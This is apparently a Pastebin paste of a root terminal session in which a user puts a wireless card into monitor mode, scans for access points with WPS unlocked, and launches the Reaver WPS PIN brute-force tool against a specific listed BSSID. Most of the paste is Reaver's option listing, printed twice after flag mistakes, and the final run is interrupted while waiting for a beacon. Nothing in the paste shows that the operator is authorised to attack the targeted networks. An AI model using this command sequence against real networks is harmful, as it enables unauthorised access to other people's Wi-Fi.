Advertisement
Guest User

Untitled

a guest
May 24th, 2016
1,088
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.45 KB | None | 0 0
  1. root@D0NTRES0LV5M5:~# ifconfig wlan0 up
  2. root@D0NTRES0LV5M5:~# ifconfig
  3. eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
  4. inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
  5. inet6 fe80::a00:27ff:febf:3a49 prefixlen 64 scopeid 0x20<link>
  6. ether 08:00:27:bf:3a:49 txqueuelen 1000 (Ethernet)
  7. RX packets 4 bytes 930 (930.0 B)
  8. RX errors 0 dropped 0 overruns 0 frame 0
  9. TX packets 34 bytes 2668 (2.6 KiB)
  10. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  11.  
  12. lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
  13. inet 127.0.0.1 netmask 255.0.0.0
  14. inet6 ::1 prefixlen 128 scopeid 0x10<host>
  15. loop txqueuelen 0 (Lokale Schleife)
  16. RX packets 20 bytes 1200 (1.1 KiB)
  17. RX errors 0 dropped 0 overruns 0 frame 0
  18. TX packets 20 bytes 1200 (1.1 KiB)
  19. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  20.  
  21. wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
  22. ether 00:1f:3f:08:a2:36 txqueuelen 1000 (Ethernet)
  23. RX packets 0 bytes 0 (0.0 B)
  24. RX errors 0 dropped 0 overruns 0 frame 0
  25. TX packets 0 bytes 0 (0.0 B)
  26. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  27.  
  28. root@D0NTRES0LV5M5:~# airmon-ng check kill
  29.  
  30.  
  31. root@D0NTRES0LV5M5:~# airmon-ng start wlan0
  32.  
  33.  
  34. PHY Interface Driver Chipset
  35.  
  36. phy0 wlan0 carl9170 AVM GmbH Fritz!WLAN N 2.4 [Atheros AR9001U]
  37.  
  38. (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
  39. (mac80211 station mode vif disabled for [phy0]wlan0)
  40.  
  41. root@D0NTRES0LV5M5:~# iwconfig
  42. eth0 no wireless extensions.
  43.  
  44. wlan0mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
  45. Retry short limit:7 RTS thr:off Fragment thr:off
  46. Power Management:off
  47.  
  48. lo no wireless extensions.
  49.  
  50. root@D0NTRES0LV5M5:~# wash -i wlan0mon
  51.  
  52. Wash v1.5.2 WiFi Protected Setup Scan Tool
  53. Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
  54. mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
  55.  
  56. BSSID Channel RSSI WPS Version WPS Locked ESSID
  57. ---------------------------------------------------------------------------------------------------------------
  58. 7C:4F:B5:5F:BC:1B 6 -64 1.0 No WLAN1
  59. 54:88:0E:D2:64:88 6 -66 1.0 No WLAN2
  60. D4:21:22:5B:D9:E3 11 -64 1.0 No WLAN3
  61. B0:48:7A:DB:3F:72 4 -63 1.0 No WLAN4
  62.  
  63. [X] ERROR: Failed to open 'wlan0mon' for capturing
  64. root@D0NTRES0LV5M5:~# iwconfig
  65. eth0 no wireless extensions.
  66.  
  67. wlan0 IEEE 802.11bgn ESSID:off/any
  68. Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm
  69. Retry short limit:7 RTS thr:off Fragment thr:off
  70. Encryption key:off
  71. Power Management:off
  72.  
  73. lo no wireless extensions.
  74.  
  75. root@D0NTRES0LV5M5:~# airmon-ng start wlan0
  76.  
  77.  
  78. PHY Interface Driver Chipset
  79.  
  80. phy1 wlan0 carl9170 AVM GmbH Fritz!WLAN N 2.4 [Atheros AR9001U]
  81.  
  82. (mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
  83. (mac80211 station mode vif disabled for [phy1]wlan0)
  84.  
  85. root@D0NTRES0LV5M5:~# iwconfig
  86. eth0 no wireless extensions.
  87.  
  88. wlan0mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
  89. Retry short limit:7 RTS thr:off Fragment thr:off
  90. Power Management:off
  91.  
  92. lo no wireless extensions.
  93.  
  94. root@D0NTRES0LV5M5:~# reaver -i wlan0mon^C
  95. root@D0NTRES0LV5M5:~# reaver -o wlan0mon -b 7C:4F:B5:5F:BC:1B -c 6 -vv
  96.  
  97. Reaver v1.5.2 WiFi Protected Setup Attack Tool
  98. Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
  99. mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
  100.  
  101. Required Arguments:
  102. -i, --interface=<wlan> Name of the monitor-mode interface to use
  103. -b, --bssid=<mac> BSSID of the target AP
  104.  
  105. Optional Arguments:
  106. -m, --mac=<mac> MAC of the host system
  107. -e, --essid=<ssid> ESSID of the target AP
  108. -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
  109. -o, --out-file=<file> Send output to a log file [stdout]
  110. -s, --session=<file> Restore a previous session file
  111. -C, --exec=<command> Execute the supplied command upon successful pin recovery
  112. -D, --daemonize Daemonize reaver
  113. -a, --auto Auto detect the best advanced options for the target AP
  114. -f, --fixed Disable channel hopping
  115. -5, --5ghz Use 5GHz 802.11 channels
  116. -v, --verbose Display non-critical warnings (-vv for more)
  117. -q, --quiet Only display critical messages
  118. -K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek)
  119. -Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful
  120. -h, --help Show help
  121.  
  122. Advanced Options:
  123. -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
  124. -d, --delay=<seconds> Set the delay between pin attempts [1]
  125. -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
  126. -g, --max-attempts=<num> Quit after num pin attempts
  127. -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
  128. -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
  129. -t, --timeout=<seconds> Set the receive timeout period [5]
  130. -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
  131. -A, --no-associate Do not associate with the AP (association must be done by another application)
  132. -N, --no-nacks Do not send NACK messages when out of order packets are received
  133. -S, --dh-small Use small DH keys to improve crack speed
  134. -L, --ignore-locks Ignore locked state reported by the target AP
  135. -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
  136. -n, --nack Target AP always sends a NACK [Auto]
  137. -w, --win7 Mimic a Windows 7 registrar [False]
  138. -X, --exhaustive Set exhaustive mode from the beginning of the session [False]
  139. -1, --p1-index Set initial array index for the first half of the pin [False]
  140. -2, --p2-index Set initial array index for the second half of the pin [False]
  141. -P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
  142. -W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link
  143.  
  144. Example:
  145. reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1
  146.  
  147. root@D0NTRES0LV5M5:~# reaver -o wlan0mon -b 7C:4F:B5:5F:BC:1B -c 6
  148.  
  149. Reaver v1.5.2 WiFi Protected Setup Attack Tool
  150. Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
  151. mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
  152.  
  153. Required Arguments:
  154. -i, --interface=<wlan> Name of the monitor-mode interface to use
  155. -b, --bssid=<mac> BSSID of the target AP
  156.  
  157. Optional Arguments:
  158. -m, --mac=<mac> MAC of the host system
  159. -e, --essid=<ssid> ESSID of the target AP
  160. -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
  161. -o, --out-file=<file> Send output to a log file [stdout]
  162. -s, --session=<file> Restore a previous session file
  163. -C, --exec=<command> Execute the supplied command upon successful pin recovery
  164. -D, --daemonize Daemonize reaver
  165. -a, --auto Auto detect the best advanced options for the target AP
  166. -f, --fixed Disable channel hopping
  167. -5, --5ghz Use 5GHz 802.11 channels
  168. -v, --verbose Display non-critical warnings (-vv for more)
  169. -q, --quiet Only display critical messages
  170. -K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek)
  171. -Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful
  172. -h, --help Show help
  173.  
  174. Advanced Options:
  175. -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
  176. -d, --delay=<seconds> Set the delay between pin attempts [1]
  177. -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
  178. -g, --max-attempts=<num> Quit after num pin attempts
  179. -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
  180. -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
  181. -t, --timeout=<seconds> Set the receive timeout period [5]
  182. -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
  183. -A, --no-associate Do not associate with the AP (association must be done by another application)
  184. -N, --no-nacks Do not send NACK messages when out of order packets are received
  185. -S, --dh-small Use small DH keys to improve crack speed
  186. -L, --ignore-locks Ignore locked state reported by the target AP
  187. -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
  188. -n, --nack Target AP always sends a NACK [Auto]
  189. -w, --win7 Mimic a Windows 7 registrar [False]
  190. -X, --exhaustive Set exhaustive mode from the beginning of the session [False]
  191. -1, --p1-index Set initial array index for the first half of the pin [False]
  192. -2, --p2-index Set initial array index for the second half of the pin [False]
  193. -P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
  194. -W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link
  195.  
  196. Example:
  197. reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1
  198.  
  199. root@D0NTRES0LV5M5:~# reaver -i wlan0mon -b 7C:4F:B5:5F:BC:1B -c 6
  200.  
  201. Reaver v1.5.2 WiFi Protected Setup Attack Tool
  202. Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
  203. mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
  204.  
  205. [+] Waiting for beacon from 7C:4F:B5:5F:BC:1B
  206. ^C
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement